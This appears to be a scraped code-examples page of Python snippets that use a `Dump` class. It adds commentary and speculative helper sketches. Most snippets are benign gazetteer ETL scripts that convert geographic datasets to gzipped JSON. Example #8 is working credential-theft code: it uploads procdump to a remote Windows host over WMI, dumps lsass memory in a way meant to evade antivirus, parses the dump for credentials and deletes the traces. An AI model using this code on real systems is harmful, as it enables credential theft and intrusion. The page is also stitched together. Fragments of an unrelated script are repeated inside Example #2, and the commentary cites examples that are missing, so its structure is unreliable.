Example #1
def generate_history(gz_file, dump_path, place_index):
    f = gzip.open(gz_file, 'rb')
    uid = uuid.uuid4()
    unique_name = uid.hex
    dump = Dump(dump_path + "/historydump/history" + unique_name + ".%04d.json.gz")
    histindex = place_index + "-history"  # i.e. gazetest2-history

    for line in f:
        index_json = line
        doc_id = json.loads(index_json)["index"]["_id"]

        doc_json = next(f)  # the document line follows its action line
        doc = json.loads(doc_json)

        digest = hashlib.sha1(json.dumps(doc, sort_keys=True).encode("utf-8")).hexdigest()

        # SAVE HISTORY (the records tied to a place which have revisions)
        history_doc = {"index": place_index, "type": "place", "id": doc_id,
                       "revisions": [{"user_created": "ETL", "created_at": time.time(), "digest": digest}]}

        dump.write_bulk(histindex, "place", doc_id, history_doc)

    f.close()
    dump.close()
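None of the gazetteer examples define `Dump`; they all construct it with a `%04d`-numbered `.json.gz` path and call `write`, `write_bulk`, `max_rows`, and `close` on it, which suggests a rotating gzip JSON-lines writer. (Example #8's `Dump` is unrelated: there it wraps a remote minidump file on an SMB share.) A minimal sketch of such a writer, every detail of which is an assumption rather than the projects' actual implementation:

import gzip
import json
import os


class Dump(object):
    """Hypothetical sketch: write JSON lines across rotating gzip files."""

    def __init__(self, path_pattern, max_rows=100000):
        # path_pattern carries a %04d slot, e.g. ".../geonames.%04d.json.gz"
        os.makedirs(os.path.dirname(path_pattern), exist_ok=True)
        self.path_pattern = path_pattern
        self.max_rows = max_rows
        self.rows = 0
        self.file_no = 0
        self.fh = gzip.open(path_pattern % self.file_no, "wt")

    def _rotate(self):
        # start the next numbered file once the current one is full
        if self.rows >= self.max_rows:
            self.fh.close()
            self.file_no += 1
            self.rows = 0
            self.fh = gzip.open(self.path_pattern % self.file_no, "wt")

    def write(self, uri, doc):
        # the real writer presumably also keys the record by uri
        self._rotate()
        self.fh.write(json.dumps(doc) + "\n")
        self.rows += 1

    def write_bulk(self, index, doc_type, doc_id, doc):
        # Elasticsearch bulk layout: an action line, then the document line
        self._rotate()
        action = {"index": {"_index": index, "_type": doc_type, "_id": doc_id}}
        self.fh.write(json.dumps(action) + "\n" + json.dumps(doc) + "\n")
        self.rows += 1

    def close(self):
        self.fh.close()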
Example #2
def generate_history(gz_file, dump_path, place_index):
    f = gzip.open(gz_file, 'rb')
    uid = uuid.uuid4()
    unique_name = uid.hex
    dump = Dump(dump_path + "/historydump/history" + unique_name +
                ".%04d.json.gz")
    histindex = place_index + "-history"  #i.e. gazetest2-history

    for line in f:
        index_json = line
        doc_id = json.loads(index_json)["index"]["_id"]

        doc_json = next(f)  # the document line follows its action line
        doc = json.loads(doc_json)

        digest = hashlib.sha1(
            json.dumps(doc, sort_keys=True).encode("utf-8")).hexdigest()

        #SAVE HISTORY (the records tied to a place which have revisions)
        history_doc = {
            "index": place_index,
            "type": "place",
            "id": doc_id,
            "revisions": [{
                "user_created": "ETL",
                "created_at": time.time(),
                "digest": digest
            }]
        }

        dump.write_bulk(histindex, "place", doc_id, history_doc)

    f.close()
    dump.close()
            "relationships": [],
            "timeframe":timeframe,
            "admin":[],
            "address": address

        }

        dump.write(uri, place)
        

if __name__ == "__main__":
    shapefile, dump_path = sys.argv[1:3]
    
    #simplify_tolerance = .01 # ~ 11km (.001 = 111m)
    simplify_tolerance = None
    uri_name = "http://maps.nypl.org/warper/layers/861"
    
    dump_basename = os.path.basename(shapefile)
    dump = Dump(dump_path + "/shapefile/"+ dump_basename + ".%04d.json.gz")
    
    extract_shapefile(shapefile, uri_name, simplify_tolerance)
    
    dump.close()
    


#python shapefile.py "/path/to/shapefile/buildings.shp" /path/to/gz_dump

#python nyc_perris_digitizer_csv.py ../../../GazetteerData/Manhattan\ Buildings\ Perris\ 10_23_2012/FinalCleanedData_Perris1854_tab.csv nydump

            "source": source,
            "alternate": alternates,
            "updated": updated,
            "uris": [uri],
            "relationships": [],
            "timeframe": timeframe,
            "admin": [],
            "address": address
        }

        dump.write(uri, place)


if __name__ == "__main__":
    shapefile, dump_path = sys.argv[1:3]

    #simplify_tolerance = .01 # ~ 11km (.001 = 111m)
    simplify_tolerance = None
    uri_name = "http://maps.nypl.org/warper/layers/861"

    dump_basename = os.path.basename(shapefile)
    dump = Dump(dump_path + "/shapefile/" + dump_basename + ".%04d.json.gz")

    extract_shapefile(shapefile, uri_name, simplify_tolerance)

    dump.close()

#python shapefile.py "/path/to/shapefile/buildings.shp" /path/to/gz_dump

#python nyc_perris_digitizer_csv.py ../../../GazetteerData/Manhattan\ Buildings\ Perris\ 10_23_2012/FinalCleanedData_Perris1854_tab.csv nydump
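Examples #3, #4, #7, and #9 all call an `extract_shapefile(shapefile, uri_name, simplify_tolerance)` that is not shown. Judging by the arguments and by the place documents built elsewhere on this page, it walks the shapefile with GDAL/OGR, optionally simplifies each geometry, and writes one place document per feature through the module-level `dump`. A rough sketch under those assumptions (the field mapping and document shape are guesses modeled on the surrounding examples):

import json

from osgeo import ogr


def extract_shapefile(shapefile, uri_name, simplify_tolerance=None):
    """Hypothetical sketch: emit one place document per shapefile feature."""
    datasource = ogr.Open(shapefile)
    layer = datasource.GetLayer(0)
    for feature in layer:
        geom = feature.GetGeometryRef()
        if simplify_tolerance:
            geom = geom.Simplify(simplify_tolerance)
        centroid = geom.Centroid()
        uri = uri_name + "#" + str(feature.GetFID())
        place = {
            "name": "",  # the real code pulls this from a source-specific field
            "centroid": [centroid.GetX(), centroid.GetY()],
            "geometry": json.loads(geom.ExportToJson()),
            "is_primary": True,
            "source": feature.items(),  # all attribute fields as a dict
            "uris": [uri],
            "relationships": [],
            "timeframe": {},
            "admin": []
        }
        dump.write(uri, place)  # writes through the module-level Dump, as above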
Example #5
def extract_geonames(data_path, dump_path):
    alt_names = tab_file(data_path + "/alternateNames.sorted.txt", columns["alternate"])
    geonames = tab_file(data_path + "/allCountries.sorted.txt", columns["geoname"])
    dump = Dump(dump_path + "/geonames/geonames.%04d.json.gz")
    extra_alt_name = {}
    # both files are pre-sorted by geoname_id, so alternate names can be
    # merge-joined against geonames in a single pass; a row read one step
    # too far is stashed in extra_alt_name for the next geoname
    for geoname in geonames:
        alt_name_list = []
        if extra_alt_name.get("geoname_id") == geoname["geoname_id"]:
            alt_name_list.append(extra_alt_name)
            extra_alt_name = {}
        for alt_name in alt_names:
            if alt_name["geoname_id"] == geoname["geoname_id"]:
                alt_name_list.append(alt_name)
            else:
                extra_alt_name = alt_name
                break
        geoname["alternate_names"] = alt_name_list
        try:
            for col in ("latitude", "longitude"):
                geoname[col] = float(geoname[col])
        except ValueError:
            ### busted coordinates
            continue
        centroid = [geoname["longitude"], geoname["latitude"]]
        population = None
        try:
            population = int(geoname["population"])
        except ValueError:
            pass
        uri = "http://geonames.org/" + geoname["geoname_id"]
        names = []
        alt_name_list.append({
            "name": geoname["name"],
            "lang": "",
            "type": "preferred"
        })
        for alt_name in alt_name_list:
            name_type = ""
            if alt_name.get("is_colloquial"): name_type = "colloquial"
            if alt_name.get("is_historic"): name_type = "historic"
            if alt_name.get("is_preferred"): name_type = "preferred"
            if alt_name.get("is_short"): name_type = "short"
            alt_name = {
                "lang": alt_name["lang"], 
                "type": name_type, 
                "name": alt_name["name"]
            }
            names.append(alt_name)
            ascii_name = transliterate(alt_name)
            if ascii_name: names.append(ascii_name)
        place = {
            "name": geoname["name"],
            "centroid": centroid,
            "feature_code": geoname["feature_code"],
            "geometry": {"type": "Point", "coordinates": centroid},
            "is_primary": True,
            "source": geoname,
            "alternate": names,
            "updated": geoname["changed_at"],
            "population": population,
            "uris": [uri],
            "relationships": [],
            "timeframe": {},
            "admin": []
        }
        dump.write(uri, place)

    dump.close()
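`tab_file` and `columns` are external helpers here: `columns["geoname"]` and `columns["alternate"]` presumably list the field names of geonames' tab-separated dumps, and `tab_file` yields one dict per row. A plausible sketch (the name and behavior are assumptions):

def tab_file(path, columns):
    """Hypothetical sketch: yield one dict per tab-separated line of path."""
    with open(path, encoding="utf-8") as f:
        for line in f:
            values = line.rstrip("\n").split("\t")
            yield dict(zip(columns, values))

Because `tab_file` would be a generator, the merge-join above consumes each alternate-name row exactly once, which is why both input files must be pre-sorted by geoname_id.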
Example #6
            "updated": updated,
            "uris":[uri],
            "relationships": [],
            "timeframe":timeframe,
            "admin":[]
        }
        
        dump.write(uri, place)
        

 
if __name__ == "__main__":
    csvfile, dump_path = sys.argv[1:3]
   
    #simplify_tolerance = .01 # ~ 11km (.001 = 111m)
    simplify_tolerance = None
    uri_name = "http://nrhp.focus.nps.gov?referenceNumber:"
    #http://nrhp.focus.nps.gov/natregadvancedsearch.do?referenceNumber:73001435
    
    dump_basename = os.path.basename(csvfile)
    dump = Dump(dump_path + "/json/"+ dump_basename + ".%04d.json.gz")
    extract_geojson(csvfile, uri_name, simplify_tolerance)
    
    dump.close()



#python nrhp.py nhrp.csv nrhpdump

#python nrhp.py "/path/to/directory"   /path/to/gz_dump2
Example #7
if __name__ == "__main__":
    shapefile, dump_path = sys.argv[1:3]

    #http://www2.census.gov/geo/tiger/TIGER2012/STATE/tl_2012_us_state.zip
    #http://www2.census.gov/geo/tiger/TIGER2012/COUNTY/tl_2012_us_county.zip

    uri_name = "http://www2.census.gov/geo/tiger/TIGER2012/COUNTY/tl_2012_us_county.zip"
    if "tl_2012_us_state" in shapefile:
        uri_name = "http://www2.census.gov/geo/tiger/TIGER2012/STATE/tl_2012_us_state.zip"

    #simplify_tolerance = .01 # ~ 11km (.001 = 111m)
    simplify_tolerance = .0001

    dump_basename = os.path.basename(shapefile)
    dump = Dump(dump_path + "/shapefile/" + dump_basename + ".%04d.json.gz")
    dump.max_rows = 1000  # rows per output file before rotating

    extract_shapefile(shapefile, uri_name, simplify_tolerance)

    dump.close()


#python tiger_line.py ../../../tiger_line/tl_2012_us_state/tl_2012_us_state.shp tigerdump
#python tiger_line.py ../../../tiger_line/tl_2012_us_county/tl_2012_us_county.shp tigerdump


#Layer name: tl_2012_us_state
#Geometry: 3D Polygon
#Feature Count: 56
Example #8
    def run(self, addr, osArch='64'):
        dcom = DCOMConnection(addr,
                              self.__username,
                              self.__password,
                              self.__domain,
                              self.__lmhash,
                              self.__nthash,
                              self.__aesKey,
                              oxidResolver=True,
                              doKerberos=self.__doKerberos,
                              kdcHost=self.__kdcHost)
        dump = None  # created later; checked in the finally block
        try:
            iInterface = dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login,
                                                 wmi.IID_IWbemLevel1Login)
            iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)
            iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL,
                                                       NULL)
            iWbemLevel1Login.RemRelease()

            win32Process, _ = iWbemServices.GetObject('Win32_Process')

            self.shell = RemoteShell(self.__share, win32Process,
                                     self.__smbConnection)

            # Upload procdump
            procpath = os.path.join(
                os.path.dirname(os.path.realpath(sys.argv[0])), 'misc',
                'procdump', 'procdump%s.exe' % (osArch))
            logging.info("%s  Uploading procdump to %s..." % (debugBlue, addr))
            if logging.getLogger().getEffectiveLevel() > 10:
                with suppress_std():
                    self.shell.do_put(procpath)
            else:
                self.shell.do_put(procpath)

            dt = datetime.now().strftime("%m-%d-%Y_%H-%M-%S")

            # Execute procdump silently with pid to avoid AVs as much as possible
            cmd = """for /f "tokens=1,2 delims= " ^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do procdump{}.exe -accepteula -ma ^%B C:\\{}.dmp""".format(
                osArch, addr + "_" + dt)
            logging.info("%s  Executing procdump on %s..." % (debugBlue, addr))
            if logging.getLogger().getEffectiveLevel() > 10:
                with suppress_std():
                    self.shell.onecmd(cmd)
            else:
                self.shell.onecmd(cmd)

            # Create dump's file descriptor to parse dumps remotely
            logging.info("%s  Creating dump's file descriptor on %s..." %
                         (debugBlue, addr))
            logging.info("%s  Parsing %s's dump remotely..." %
                         (debugBlue, addr))
            dump = Dump(self.__smbConnection,
                        """{}.dmp""".format(addr + "_" + dt))
            credentials = parseDump(dump)
            if credentials is not None:
                print_credentials(addr, credentials)
                write_credentials(addr, credentials)

        finally:
            # Clean remote machines (dump & procdump)
            logging.info("%s  Closing dump file on %s..." % (debugBlue, addr))
            if dump is not None:
                dump.close()
            logging.info("%s  Deleting procdump on %s..." % (debugBlue, addr))
            if logging.getLogger().getEffectiveLevel() > 10:
                with suppress_std():
                    self.shell.onecmd("del procdump%s.exe" % (osArch))
            else:
                self.shell.onecmd("del procdump%s.exe" % (osArch))

            logging.info("%s  Deleting dump on %s..." % (debugBlue, addr))
            if logging.getLogger().getEffectiveLevel() > 10:
                with suppress_std():
                    self.shell.onecmd("del %s.dmp" % (addr + "_" + dt))
            else:
                self.shell.onecmd("del %s.dmp" % (addr + "_" + dt))

            if self.__smbConnection is not None:
                self.__smbConnection.logoff()
            dcom.disconnect()
            sys.stdout.flush()
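`suppress_std` is not defined in this example either. Since it wraps the `RemoteShell` calls only when the logger sits above DEBUG (effective level > 10), it is presumably a context manager that swallows stdout and stderr. A minimal sketch under that assumption:

import contextlib
import io
import sys


@contextlib.contextmanager
def suppress_std():
    """Hypothetical sketch: temporarily silence stdout and stderr."""
    saved_out, saved_err = sys.stdout, sys.stderr
    sys.stdout = sys.stderr = io.StringIO()
    try:
        yield
    finally:
        sys.stdout, sys.stderr = saved_out, saved_err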
Example #9
if __name__ == "__main__":
    shapefile, dump_path = sys.argv[1:3]

    #http://www2.census.gov/geo/tiger/TIGER2012/STATE/tl_2012_us_state.zip
    #http://www2.census.gov/geo/tiger/TIGER2012/COUNTY/tl_2012_us_county.zip

    uri_name = "http://www2.census.gov/geo/tiger/TIGER2012/COUNTY/tl_2012_us_county.zip"
    if "tl_2012_us_state" in shapefile:
        uri_name = "http://www2.census.gov/geo/tiger/TIGER2012/STATE/tl_2012_us_state.zip"

    #simplify_tolerance = .01 # ~ 11km (.001 = 111m)
    simplify_tolerance = .0001

    dump_basename = os.path.basename(shapefile)
    dump = Dump(dump_path + "/shapefile/" + dump_basename + ".%04d.json.gz")
    dump.max_rows = 1000  # rows per output file before rotating

    extract_shapefile(shapefile, uri_name, simplify_tolerance)

    dump.close()

#python tiger_line.py ../../../tiger_line/tl_2012_us_state/tl_2012_us_state.shp tigerdump
#python tiger_line.py ../../../tiger_line/tl_2012_us_county/tl_2012_us_county.shp tigerdump

#Layer name: tl_2012_us_state
#Geometry: 3D Polygon
#Feature Count: 56
#Extent: (-179.231086, -14.601813) - (179.859681, 71.441059)
#Layer SRS WKT:
#GEOGCS["GCS_North_American_1983",
Example #10
def extract_geonames(data_path, dump_path):
    alt_names = tab_file(data_path + "/alternateNames.sorted.txt",
                         columns["alternate"])
    geonames = tab_file(data_path + "/allCountries.sorted.txt",
                        columns["geoname"])
    dump = Dump(dump_path + "/geonames/geonames.%04d.json.gz")
    extra_alt_name = {}
    # both files are pre-sorted by geoname_id, so alternate names can be
    # merge-joined against geonames in a single pass; a row read one step
    # too far is stashed in extra_alt_name for the next geoname
    for geoname in geonames:
        alt_name_list = []
        if extra_alt_name.get("geoname_id") == geoname["geoname_id"]:
            alt_name_list.append(extra_alt_name)
            extra_alt_name = {}
        for alt_name in alt_names:
            if alt_name["geoname_id"] == geoname["geoname_id"]:
                alt_name_list.append(alt_name)
            else:
                extra_alt_name = alt_name
                break
        geoname["alternate_names"] = alt_name_list
        try:
            for col in ("latitude", "longitude"):
                geoname[col] = float(geoname[col])
        except ValueError:
            ### busted coordinates
            continue
        centroid = [geoname["longitude"], geoname["latitude"]]
        population = None
        try:
            population = int(geoname["population"])
        except ValueError:
            pass
        uri = "http://geonames.org/" + geoname["geoname_id"]
        names = []
        alt_name_list.append({
            "name": geoname["name"],
            "lang": "",
            "type": "preferred"
        })
        for alt_name in alt_name_list:
            name_type = ""
            if alt_name.get("is_colloquial"): name_type = "colloquial"
            if alt_name.get("is_historic"): name_type = "historic"
            if alt_name.get("is_preferred"): name_type = "preferred"
            if alt_name.get("is_short"): name_type = "short"
            alt_name = {
                "lang": alt_name["lang"],
                "type": name_type,
                "name": alt_name["name"]
            }
            names.append(alt_name)
            ascii_name = transliterate(alt_name)
            if ascii_name: names.append(ascii_name)
        place = {
            "name": geoname["name"],
            "centroid": centroid,
            "feature_code": geoname["feature_code"],
            "geometry": {
                "type": "Point",
                "coordinates": centroid
            },
            "is_primary": True,
            "source": geoname,
            "alternate": names,
            "updated": geoname["changed_at"],
            "population": population,
            "uris": [uri],
            "relationships": [],
            "timeframe": {},
            "admin": []
        }
        dump.write(uri, place)

    dump.close()
Example #11
def extract_lc_auth(data_path, dump_path):
    dump = Dump(dump_path + "/lc_auth/lc_auth.%04d.json.gz")
    for line in open(data_path):
        auth = json.loads(line)
        if "isMemberOfMADSScheme" in auth:
            del auth["isMemberOfMADSScheme"]
        if "adminMetadata" in auth:
            del auth["adminMetadata"]
        alt_names = []
        # print "hasVariant: ", auth.get("hasVariant")
        for label in get_labels(auth.get("hasVariant")):
            alt_names.append({"name": label})
        for label in get_labels(auth.get("hasEarlierEstablishedForm")):
            alt_names.append({"name": label, "type": "historical"})
        geom = fcode = None
        has_source = auth.get("hasSource")
        if has_source:
            note = has_source.get("citation-note")
            if note:
                lat = coords_to_dms(ns_coords, note)
                lon = coords_to_dms(ew_coords, note)
                if lat and lon:
                    geom = {"type": "Point", "coordinates": [lon, lat]}
                # search the citation-note
                fcode = extract_fcode(note)
            if not fcode:
                source = has_source.get("citation-source", "")
                fcode = extract_fcode(source)
        if not fcode:
            fcode = "AUTH"
        uri = auth["id"]
        if "authoritativeLabel" not in auth:
            continue

        updated = datetime.datetime.utcnow().replace(second=0, microsecond=0).isoformat()

        auth_source = {"type": [], "id": "", "authoritativeLabel": "", "note": "", "editorialNote": ""}
        for key in auth_source.keys():
            if key in auth:
                auth_source[key] = auth[key]

        place = {
            "name": auth["authoritativeLabel"],
            "feature_code": fcode,
            "alternate": alt_names,
            "is_primary": True,
            "updated": updated,
            "source": auth_source,
            "uris": [uri],
            "relationships": [],
            "timeframe": {},
            "admin": [],
        }
        if geom:
            place["geometry"] = geom
            place["centroid"] = geom["coordinates"]
        else:
            place["geometry"] = {}
            place["centroid"] = []
        dump.write(uri, place)
    dump.close()
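`ns_coords`, `ew_coords`, `coords_to_dms`, `get_labels`, and `extract_fcode` are all external to this snippet. From the call sites, the first two look like compiled regexes for degree-minute-second strings in LC citation notes, and `coords_to_dms` converts the first match to signed decimal degrees. A sketch of that pair under those assumptions (the patterns are invented for illustration):

import re

# hypothetical patterns for strings like 40°41'21" N or 074 00 23 W
ns_coords = re.compile(r"(\d{1,2})\D+(\d{1,2})\D+(\d{1,2})\D*([NS])")
ew_coords = re.compile(r"(\d{1,3})\D+(\d{1,2})\D+(\d{1,2})\D*([EW])")


def coords_to_dms(pattern, note):
    """Hypothetical sketch: first DMS match in note, as signed decimal degrees."""
    m = pattern.search(note)
    if not m:
        return None
    deg, mins, secs, hemi = m.groups()
    value = int(deg) + int(mins) / 60.0 + int(secs) / 3600.0
    # south and west are negative; despite the name, the call sites expect
    # plain numbers they can put straight into a GeoJSON point
    return -value if hemi in ("S", "W") else value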
Example #12
def extract_lc_auth(data_path, dump_path):
    dump = Dump(dump_path + "/lc_auth/lc_auth.%04d.json.gz")
    for line in open(data_path):
        auth = json.loads(line)
        if "isMemberOfMADSScheme" in auth: del auth["isMemberOfMADSScheme"]
        if "adminMetadata" in auth: del auth["adminMetadata"]
        alt_names = []
        #print "hasVariant: ", auth.get("hasVariant")
        for label in get_labels(auth.get("hasVariant")):
            alt_names.append({"name": label})
        for label in get_labels(auth.get("hasEarlierEstablishedForm")):
            alt_names.append({"name": label, "type": "historical"})
        geom = fcode = None
        has_source = auth.get("hasSource")
        if has_source:
            note = has_source.get("citation-note")
            if note:
                lat = coords_to_dms(ns_coords, note)
                lon = coords_to_dms(ew_coords, note)
                if lat and lon:
                    geom = {"type": "Point", "coordinates": [lon, lat]}
                # search the citation-note
                fcode = extract_fcode(note)
            if not fcode:
                source = has_source.get("citation-source", "")
                fcode = extract_fcode(source)
        if not fcode:
            fcode = "AUTH"
        uri = auth["id"]
        if "authoritativeLabel" not in auth:
            continue

        updated = datetime.datetime.utcnow().replace(
            second=0, microsecond=0).isoformat()

        auth_source = {
            "type": [],
            "id": "",
            "authoritativeLabel": "",
            "note": "",
            "editorialNote": ""
        }
        for key in auth_source.keys():
            if key in auth:
                auth_source[key] = auth[key]

        place = {
            "name": auth["authoritativeLabel"],
            "feature_code": fcode,
            "alternate": alt_names,
            "is_primary": True,
            "updated": updated,
            "source": auth_source,
            "uris": [uri],
            "relationships": [],
            "timeframe": {},
            "admin": []
        }
        if geom:
            place["geometry"] = geom
            place["centroid"] = geom["coordinates"]
        else:
            place["geometry"] = {}
            place["centroid"] = []
        dump.write(uri, place)
    dump.close()
Example #13
                names.append(ascii_name)
        source = dict(row)
        for key in list(source.keys()):  # list() so we can delete while iterating
            if not source[key] or key in ("geojson", "centroid_x",
                                          "centroid_y", "way"):
                del source[key]
        place = {
            "name": preferred_name,
            "centroid": centroid,
            "feature_code": feature_code,
            "geometry": geometry,
            "is_primary": True,
            "source": source,
            "alternate": names,
            "updated": row["timestamp"],
            "uris": [uri],
            "relationships": [],
            "timeframe": {},
            "admin": []
        }
        dump.write(uri, place)


if __name__ == "__main__":
    import sys
    database, dump_path = sys.argv[1:3]
    dump = Dump(dump_path + "/osm/osm.%04d.json.gz")
    extract_osm(database, "planet_osm_point", "node", dump)
    extract_osm(database, "planet_osm_polygon", "way", dump)
    dump.close()
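Finally, Examples #5, #10, and #13 append the result of a `transliterate` helper that is never shown. Judging by its use, it returns an ASCII variant of a name record, or nothing when folding changes nothing. A sketch of that behavior, assuming the name-dict shape used above:

import unicodedata


def transliterate(alt_name):
    """Hypothetical sketch: ASCII-fold a name record; None if unchanged."""
    ascii_text = (unicodedata.normalize("NFKD", alt_name["name"])
                  .encode("ascii", "ignore")
                  .decode("ascii"))
    if not ascii_text or ascii_text == alt_name["name"]:
        return None
    return {"lang": alt_name.get("lang", ""),
            "type": alt_name.get("type", ""),
            "name": ascii_text}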